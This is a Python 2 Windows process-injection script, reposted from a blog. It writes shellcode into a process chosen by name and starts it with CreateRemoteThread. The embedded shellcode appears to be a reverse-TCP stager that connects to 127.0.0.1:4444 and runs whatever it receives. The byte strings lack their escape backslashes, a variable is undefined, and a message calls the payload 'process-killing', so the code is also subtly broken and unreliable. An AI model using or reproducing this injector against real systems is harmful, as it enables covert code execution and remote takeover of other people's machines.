# Reposted from: https://blog.csdn.net/Jailman/article/details/77573990
import sys
import psutil
import ctypes
from ctypes import *
# Win32 constants used by the ctypes calls further down (values as in the Windows SDK).
PAGE_EXECUTE_READWRITE = 0x00000040                      # page protection: read + write + execute
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )  # STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | all process-specific rights
VIRTUAL_MEM = ( 0x1000 | 0x2000 )                        # MEM_COMMIT | MEM_RESERVE
# `windll` comes from `from ctypes import *`; it only exists on Windows.
kernel32 = windll.kernel32
# Target process name taken from the command line.
# NOTE(review): sys.argv[1] is read before it is checked, so a missing
# argument raises IndexError here instead of printing the usage line; and
# `if not sys.argv[1]` only detects an empty string, not an absent argument.
pName = sys.argv[1]
if not sys.argv[1]:
    print "Code Injector: ./code_injector.py <name to inject>"
    sys.exit(0)
# shellcode =
# "x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42"
# "x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03"
# "x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b"
# "x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e"
# "x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c"
# "x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74"
# "x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe"
# "x49x0bx31xc0x51x50xffxd7";
# Payload that is later copied into the target process. It is assembled as
# one string so that its length can be handed to VirtualAllocEx and
# WriteProcessMemory. The file gives no description of what the machine
# code does, so treat it as an opaque blob (a second, commented-out
# variant sits above).
shellcode = ""
shellcode += "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"
shellcode += "x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
shellcode += "x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"
shellcode += "x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"
shellcode += "x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"
shellcode += "xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"
shellcode += "xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"
shellcode += "xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"
shellcode += "x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"
shellcode += "x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"
shellcode += "x5fx5ax8bx12xebx8dx5dx68x33x32x00x00x68"
shellcode += "x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8"
shellcode += "x90x01x00x00x29xc4x54x50x68x29x80x6bx00"
shellcode += "xffxd5x6ax05x68x7fx00x00x01x68x02x00x11"
shellcode += "x5cx89xe6x50x50x50x50x40x50x40x50x68xea"
shellcode += "x0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"
shellcode += "x74x61xffxd5x85xc0x74x0axffx4ex08x75xec"
shellcode += "xe8x61x00x00x00x6ax00x6ax04x56x57x68x02"
shellcode += "xd9xc8x5fxffxd5x83xf8x00x7ex36x8bx36x6a"
shellcode += "x40x68x00x10x00x00x56x6ax00x68x58xa4x53"
shellcode += "xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9"
shellcode += "xc8x5fxffxd5x83xf8x00x7dx22x58x68x00x40"
shellcode += "x00x00x6ax00x50x68x0bx2fx0fx30xffxd5x57"
shellcode += "x68x75x6ex4dx61xffxd5x5ex5exffx0cx24xe9"
shellcode += "x71xffxffxffx01xc3x29xc6x75xc7xc3xbbxf0"
shellcode += "xb5xa2x56x6ax00x53xffxd5"
# Number of bytes to allocate in, and copy to, the remote process.
code_size = len(shellcode)
# Toolhelp32 snapshot flag; only referenced by the commented-out getProcPid() walker below.
TH32CS_SNAPPROCESS = 0x00000002
class PROCESSENTRY32(ctypes.Structure):
    """ctypes mirror of the Win32 Toolhelp32 PROCESSENTRY32 record.

    Only the commented-out getProcPid() snapshot walker uses it; the live
    code path resolves the PID through psutil instead, so this class is
    currently dead code.
    """
    # NOTE(review): th32DefaultHeapID is ULONG_PTR in the SDK header, so
    # c_ulong only matches the native layout on 32-bit Python — confirm
    # before re-enabling the Toolhelp32 path.
    _fields_ = [("dwSize", ctypes.c_ulong),             # the walker sets this to sizeof(PROCESSENTRY32) before Process32First
                ("cntUsage", ctypes.c_ulong),
                ("th32ProcessID", ctypes.c_ulong),      # PID returned by the walker on a name match
                ("th32DefaultHeapID", ctypes.c_ulong),
                ("th32ModuleID", ctypes.c_ulong),
                ("cntThreads", ctypes.c_ulong),
                ("th32ParentProcessID", ctypes.c_ulong),
                ("pcPriClassBase", ctypes.c_ulong),
                ("dwFlags", ctypes.c_ulong),
                ("szExeFile", ctypes.c_char * 260)]     # executable name, MAX_PATH characters; compared against procName by the walker
# def getProcPid(procName):
# CreateToolhelp32Snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot
# Process32First = ctypes.windll.kernel32.Process32First
# Process32Next = ctypes.windll.kernel32.Process32Next
# CloseHandle = ctypes.windll.kernel32.CloseHandle
# hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
# pe32 = PROCESSENTRY32()
# pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
# if Process32First(hProcessSnap,ctypes.byref(pe32)) == False:
# return
# if pe32.szExeFile == procName:
# CloseHandle(hProcessSnap)
# return pe32.th32ProcessID
# while True:
# #yield pe32 #save the pe32
# if Process32Next(hProcessSnap,ctypes.byref(pe32)) == False:
# break
# if pe32.szExeFile == procName:
# CloseHandle(hProcessSnap)
# return pe32.th32ProcessID
# CloseHandle(hProcessSnap)
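def getProcName(pname):
    """Return the PID (as a string) of the first process named *pname*.

    The name comparison is case-insensitive. Processes that exit or cannot
    be inspected while the table is being scanned are skipped. Returns
    ``None`` when no process matches.
    """
    wanted = pname.lower()
    for proc in psutil.process_iter():
        try:
            name = proc.name()
        except (psutil.AccessDenied, psutil.NoSuchProcess):
            # Protected or already-gone process: skip it rather than abort the scan.
            continue
        if name.lower() == wanted:
            # Use the documented attribute instead of parsing repr(proc);
            # the repr format is not a stable API. Kept as str so the caller's
            # int() conversion continues to work unchanged.
            return str(proc.pid)
    return None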
# Resolve the target PID from the process name (first match wins).
# NOTE(review): getProcName() returns None when no process matches, and
# int(None) raises TypeError here instead of giving a clear message.
procPid = int(getProcName(pName))
# procPid = 40560
print procPid
# Get a handle to the process we are injecting into.
# The OpenProcess -> VirtualAllocEx(RWX) -> WriteProcessMemory ->
# CreateRemoteThread sequence below is the textbook remote-thread injection
# pattern; it is exactly what host telemetry (Sysmon Event ID 10 ProcessAccess,
# Event ID 8 CreateRemoteThread) and EDR behavioural rules key on.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, procPid )
if not h_process:
    # NOTE(review): `pid` is not defined anywhere in this file, so this line
    # raises NameError instead of printing; procPid is the intended name.
    print "[*] Couldn't acquire a handle to PID: %s" % pid
    sys.exit(0)
# Allocate some space for the shellcode (committed + reserved, RWX protection).
arg_address = kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)
# Write out the shellcode
written = c_int(0)   # receives the number of bytes WriteProcessMemory reports as written
kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))
# Now we create the remote thread and point its entry routine
# to the head of our shellcode
thread_id = c_ulong(0)   # filled in by CreateRemoteThread with the new thread's ID
if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)):
    print "[*] Failed to inject process-killing shellcode. Exiting."
    sys.exit(0)
print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value
# NOTE(review): h_process is never released with CloseHandle; the handle
# lives until the interpreter exits.